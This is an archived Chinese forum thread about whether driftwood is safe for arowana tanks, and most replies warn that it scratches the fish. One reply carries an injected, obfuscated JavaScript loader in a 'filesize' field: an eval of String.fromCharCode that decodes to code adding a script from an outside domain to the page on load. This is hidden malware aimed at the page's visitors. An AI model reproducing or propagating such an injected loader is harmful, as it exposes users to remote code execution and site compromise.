龙鱼之巅

标题: 养龙鱼用沉木到底好不好呢 [打印本页]

作者: 何斌    时间: 2017-4-9 22:28
标题: 养龙鱼用沉木到底好不好呢
求高手

作者: 友qq    时间: 2017-4-9 22:36
不好,容易刮到龙
作者: 微醺情轩    时间: 2017-4-9 22:37
我也想放个拱形的,借楼主的地方吸收经验
作者: 大尾巴002    时间: 2017-4-9 22:46
建议裸缸
作者: Musicman..    时间: 2017-4-9 22:50
千万不要放
作者: 8016    时间: 2017-4-9 22:51
看各人喜欢了
作者: 施長忠    时间: 2017-4-9 23:08
龙鱼容易受伤!
作者: 绚丽旭日    时间: 2017-4-9 23:15
会把龙鳞划伤
作者: u135AEKD6302    时间: 2017-4-9 23:25

这种尖部朝上枝条太多的,好象真不适合。我二个缸内也都放了沉木,是那种造形简单的,主要因为混养了七彩和神仙,觉得放块沉木、绑点水榕、铁皇冠更赏心悦目一些。不过,我也是新手,现在的水温,水草能成活多久心中也没底。 001.JPG

作者: 情歌歌歌    时间: 2017-4-9 23:25
最好别放 容易伤到鱼
作者: yuyu5255    时间: 2017-4-9 23:33
表面要非常光划差不多

filesize ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)

作者: 风满楼1115    时间: 2017-4-9 23:42
不太好,容易刮伤龙。
作者: kuny坤    时间: 2017-4-10 00:13
个人感觉不好
作者: legmz    时间: 2017-4-10 00:27
最好别用,影响美观,对龙鱼有划伤的危险
作者: Ashrigo    时间: 2017-4-10 04:31
我缸里就放了沉木和水榕,效果非常好。之前我也担心鱼划伤,但大半年过去了,从没有发生鱼划伤的事件。任何事情只有自己试过了,才知道合适不合适,不要人云亦云
作者: 依稀    时间: 2017-4-10 08:09
最好还是不要放
作者: 原来喜欢折腾    时间: 2017-4-10 09:51
如果龙不乱串就没问题
作者: zgr1717    时间: 2017-4-10 10:36
小心撞伤
作者: jianku    时间: 2017-4-10 10:53
最好别放,鱼容易受伤,还不好清理鱼缸
作者: 13525094018    时间: 2017-4-10 11:31
最好还是不要用了
作者: Alley艾莉鞋业    时间: 2017-4-10 12:17
这种的还是算了吧,。太危险了
作者: ddemco    时间: 2017-4-10 12:37
看个人 心情了啊 , 方别放那些枝条太多的啊,放点也没事的哦哦
作者: shibin18    时间: 2017-4-10 20:49

最好还是不要放
作者: BAIJJJJ    时间: 2017-4-16 07:30
这种沉木养龙肯定不好
作者: 猫叔恰根烟    时间: 2018-7-6 18:49
我觉得主要看你家里有几条龙,我家两条龙,天天在缸里面赛跑,我是不敢放。如果一条可能没事吧。

欢迎光临 龙鱼之巅 (http://longyu.longdian.com/) Powered by Discuz! X2.5